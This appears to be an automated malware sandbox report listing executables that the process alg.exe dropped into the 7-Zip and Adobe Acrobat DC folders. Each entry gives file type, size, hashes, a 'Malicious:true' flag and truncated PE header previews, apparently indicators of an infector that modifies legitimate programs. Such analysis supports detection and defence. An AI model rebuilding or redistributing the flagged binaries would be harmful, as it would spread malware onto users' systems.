                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6405A05204DE6221C60153543F81B1D16572C3D2F9F19421582167369A5E9760
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2A86701E7A29E4EBC8495C6D33900A1939E303B33AB0B2FB46AE378295BA2D37B368C387A175FA40610A7EFF8251FC4EBF7DD74C78ED1FDC899091145DB9A4D8
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......'..... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.623139518928406
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:2+gkESfh4CodsqjnhMgeiCl7G0nehbGZpbD:rgkE+S/Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:47C9E97D0A5285E1EF8A2E78B09486D8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:779900B49A36559112E5770A1B57FBFBCD7C670B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F901C9767C7A17F53C7A861ED7AC5A148EFBB726147B948F758B1C77CFB4812B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:924005D8D9DBB55A7750BF2D5E6D437E1D5721F0823FBD8EA7FF5D935D821EC60F268D42010F0ED6473E8B2CAF05281951EE97C9056B083D8E4813C238E5EABB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.096659935206379
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:EBpDRmi78gkPXlyo0Gtjr6sqjnhMgeiCl7G0nehbGZpbD:ANRmi78gkPX4o0GtjaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:910C1B91A6403862D9B12C9ACE8E1AC9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:02F13284159C9541F012BBABA4E482C82922C79C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:737D8C92BE8DD6D71E42C4AFD1612254713ED4B4FC5AAD115599946FB7CA86A1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B13EAD683BB5EFA203FC4C309B377EC1C9F0C950D331DD7144A1466D39EF5033788ACD7EEFE8EA1ABCB66AA6BBCFA5539E133D2669BD1C4AE7693BD474EB85C4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.22905780117587
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:aLOS2oTPIXVdsqjnhMgeiCl7G0nehbGZpbD:K/TSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6D4489BAF3F89721D479DCAEDF3C13B4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8B0D06BFE04955B7A3813EC1E91DD6EEDF4C5B5A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DD6302D9DCBD4D5E3BFEFE3584CA07771433094B010D81E49293B4285B8ED2F6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4E438E9E659282458EA77EE08712CD050064F9348255B3B9889A3722D5E7A4A9F7EB1D5B3E7FA2372088B7596C162870C7A9CB62B8986E225BB1B0AC8675606D
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................8.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.031207085144543
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:q1rXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:q1rsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:463B3DF65534AEBDF731ED8FB0D4073F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E18E5CA14FB82B29F0814E47D5675EA2D317A1E9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:90F9C73F44135F763964C76C3A85B4863A448823591840DCA31B4BE94BBF7293
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:836E9D7936AE28E02DE24451F641DB36E78BBD09BC8925352E3A8AE9C1E206FCC1D84F08844004E68228BD6FA2983503B8DBA10E6EFD400BFBBFF8D818B8B609
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................{.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.712035369983061
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:YRudzYXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:YAdzYsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EB4346E15357523B56DB511D9771649F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3C11ACC7AB3C42BFE30CC15C44DFCD612C56E12B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2A89962F3534629ABFB2B38CB4951AE31BF09C41FCA37B8E336BE02A80CB9128
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0ED2265512293DE8C6820FA196C12B57241A353EAC91458A0DEF021327BC5E2E1234B38B08AC8E5F6252C460603EBAD9BD7390F8736859652355E222AAE7E3EB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.....................................n.... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.082171144295277
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:vvMXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:csqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:16F211E43012D780F4AACC3B86EBEBC0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6552881BE75515EA831E385D9911F963C1EC4BD8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2492B0E74C39BF7193FA108E7A3B51A3D2C22637CC841667899BD5EBEB65E24B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:38A56BF395FC1FCAA3B12F9135B94C36BAFCF8592E51F789AA752DBB9EDFF52350E1C4B1C05336C794E61AEF85928A3ECE2E5D4F6019820C156BB47E6C34DC23
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.468633743901251
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:q5zhM1XSEJsqjnhMgeiCl7G0nehbGZpbD:wMsEDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F798B9D84BAA5209EF1346E3415F6190
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DADFD7E6220D786E7206BC6560124DA39B4A43D7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A45986C684B73F4E9A27AA1B33FEE88313F66E95245FD7D38615F99C72937D00
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:894BF9CC32A26ED4761CF091D26E0AF0FAF4942013C3F6AB85BAC9A3E33B5A2B837D35617AF3AF88DDCD9F0D34AE02031A5BD32E2E5EBBEC170216B803FFB36A
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................ud.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.499789886960118
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:LtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7552Dmg27RN:LjEIa4HIEWOc5AD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:03ED7C93A4906BF58F6BDDEF422C32EC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:051C17A96F841C1951A3A6628210E07BCED0A553
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:084D2BF0D2B95BA7A056787E47765C482B58596C2AFF88C945E74063CD300C86
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:628B6CD9342961B400EC6A96260AA5E162A5773B180DBD4A1151328CB223404C6AC12F7351FC12382F908126A0C327FE411868D781145BC2DBDDB6E535B1B6A4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9993673254602005
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:eQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:dXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CC14EC4049FA2033CA9B64F99E35F5E6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:230BFD5A42CEF027C957D7B95D7AFB70DD167457
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D07EA1331091F09469DDB5863C759CFF2D56975177666632D88A777D285F8BDE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6DAF151076A19F107422DE30C789E2C1C3766917AEDAA2414FDF8368926D4E46B8DBC69DD8C15F392C309DF42FB5A17FA3EA3E352F57716FFA4F0BEC5E26C370
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......c.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1180160
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.084820283384092
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+WcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+ZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:440A1B1DBE3CD4C579C4E7B163DEDD28
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8F1B048D42AFBD8659A3C2790DCC90EE4EB9CC17
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3C7135873C5B38C56370FC40FE112AB07BC65F0BBC57B3BB6C12373341096C91
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:855C6A679A7AA5FA4E7019AA03034D4774C4D0F3A7D54C97FC2805F52F892B08BE6370378D5C634CDDA3724D3C629E2779C0B3952FE0DBE83FBA2AEC534E2C88
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.386711785387106
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:VDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXI:mnN9KfxLk6GEQTX5UKzND3D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B50EA3E0E9E5F795061CCDD0475F5D97
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CDE382DBEF86B6B2BC059EEDB57B15C73F1B3F83
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D12127F30CAD49A4AB6BD47DFEEE45E5DA79DB17689CDB8E04D890F3A389B5CC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:01F5AF77EA3D9D843369CDF40A9F346B3C7FB6DDB55CAB4056668D8C4B1CAB43A6E18B8F210B6CABF9361A59260B3B998295E82DF120586C9D893A677A98EFAC
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......;_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.041499912106845
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:qBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbEe:qBsqjnhMgeiCl7G0nehbGZpbDo
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E5D0CE14EFDD98693622602AC3166200
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:73357718C56D41823270E9A0BAA8E386497CC73B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:46535EE4517431BF6CDF779B4AD6C3ED02B416E3B7F6746A6215550B93841387
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DA59B472699CB27CD0C8C89061976694A0D5FD52658DF1DF4E97D111D4C2F56354E16733BC15D3D20CFD942614A51D2F2B6B2146174BE0C0722BA749EB7A04B9
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.....................................5.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.596680452933355
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:cb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKGD527BWG:OnPgTHIwZoRBk9DdhSUEVIXgKGVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:960555B3CA61DD8B03F6EC3B9C03BEF5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E6DC8E4989E403212E7A224CCC01D4A3B3A2F8F9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E09D78E65BFF991AC2F000E5D60A3DA12AAB111B433CA46CF5DD4564E9EBF9C1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AF1D294CD012787EA7DF0E4EDCB964BE1A480040555900CCA7F6188293AEF5190E9C7A5BA7A03134FEFA19C713B4F04878860466EEBD59FA5B91633D26D4F3D5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
